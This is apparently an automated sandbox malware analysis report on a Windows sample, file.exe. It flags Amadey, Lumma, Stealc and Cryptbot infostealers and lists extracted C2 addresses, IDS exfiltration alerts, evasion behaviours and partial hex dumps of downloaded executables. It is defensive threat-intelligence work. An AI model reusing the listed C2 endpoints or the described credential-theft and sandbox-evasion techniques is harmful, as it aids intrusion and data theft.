Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561305
MD5: 3dda196e23d46002e364e5cab7803f7a
SHA1: fba9b6b66fb54d04d82b412e41c61051d72cdabb
SHA256: 8810efdced51fdea03108e8062441f480727460876660c86ef372a8f7ae5feb4
Tags: exeuser-Bitsight
Infos:

Detection

Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected Cryptbot
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Excessive usage of taskkill to terminate processes
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.206/v= Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php9&T Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000000.00000002.1734319751.0000000000651000.00000040.00000001.01000000.00000003.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 2235d4f703.exe.2132.11.memstrmin Malware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
Source: 86526d7b20.exe.3428.10.memstrmin Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Multi AV Scanner detection for domain / URL
Source: http://185.215.113.16/hT Virustotal: Detection: 18% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe ReversingLabs: Detection: 42%
Multi AV Scanner detection for submitted file
Source: file.exe Virustotal: Detection: 44% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Source: 2a8b7e5b78.exe, 00000007.00000003.2463978988.0000000007162000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_6f63c37f-c
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49843 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49847 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49857 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49875 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49878 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49885 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49887 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49888 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.30.17.174:443 -> 192.168.2.4:49893 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49899 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49902 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.30.17.174:443 -> 192.168.2.4:49905 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49913 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49917 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49920 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49931 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49939 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49945 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49955 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49978 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49980 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49990 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:50005 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:50085 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50096 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50100 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50104 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50118 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50117 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50116 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50119 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.53.14:443 -> 192.168.2.4:50166 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.53.14:443 -> 192.168.2.4:50168 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50172 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50171 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.91:443 -> 192.168.2.4:50176 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50178 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50179 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50181 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50180 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.53.14:443 -> 192.168.2.4:50187 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.189.173.20:443 -> 192.168.2.4:50196 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50203 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50205 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50204 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.189.173.15:443 -> 192.168.2.4:50231 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50253 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50250 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50251 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50252 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: chrome.exe Memory has grown: Private usage: 1MB later: 27MB
Source: firefox.exe Memory has grown: Private usage: 1MB later: 187MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49748 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49754
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49785 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49806 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49833 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49834 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49865 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49855 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49877 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49910 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49933 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49949 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:50260 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49807 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49807 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49814 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49814 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49888 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49850 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49850 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49843 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49843 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49857 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49931 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49887 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49887 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49878 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49878 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49980 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49945 -> 172.67.162.84:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50005 -> 172.67.162.84:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: https://property-imper.sbs/api
Source: Malware configuration extractor IPs: 185.215.113.43
Connects to many different domains
Source: unknown Network traffic detected: DNS query count 37
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 02:21:09 GMTContent-Type: application/octet-streamContent-Length: 4392960Last-Modified: Sat, 23 Nov 2024 00:46:58 GMTConnection: keep-aliveETag: "67412602-430800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e9 85 3c 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 fc 49 00 00 96 73 00 00 32 00 00 00 60 c4 00 00 10 00 00 00 10 4a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 90 c4 00 00 04 00 00 19 ac 43 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 00 71 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 44 c4 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 44 c4 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 e0 70 00 00 10 00 00 00 78 27 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 f0 70 00 00 00 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 00 71 00 00 02 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 37 00 00 10 71 00 00 02 00 00 00 8a 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 61 62 6c 79 7a 6c 73 00 60 1b 00 00 f0 a8 00 00 56 1b 00 00 8c 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 64 69 68 67 75 65 74 00 10 00 00 00 50 c4 00 00 04 00 00 00 e2 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 c4 00 00 22 00 00 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 23 Nov 2024 02:21:22 GMTContent-Type: application/octet-streamContent-Length: 1866240Last-Modified: Sat, 23 Nov 2024 01:52:56 GMTConnection: keep-aliveETag: "67413578-1c7a00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 51 3c 3f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 0a 04 00 00 c2 00 00 00 00 00 00 00 d0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4a 00 00 04 00 00 ec 61 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 80 05 00 70 00 00 00 00 70 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 60 05 00 00 10 00 00 00 62 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 70 05 00 00 02 00 00 00 72 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 05 00 00 02 00 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2a 00 00 90 05 00 00 02 00 00 00 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 62 7a 78 61 61 6e 67 00 e0 19 00 00 e0 2f 00 00 da 19 00 00 78 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 6a 66 75 74 65 6e 70 00 10 00 00 00 c0 49 00 00 06 00 00 00 52 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 49 00 00 22 00 00 00 58 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 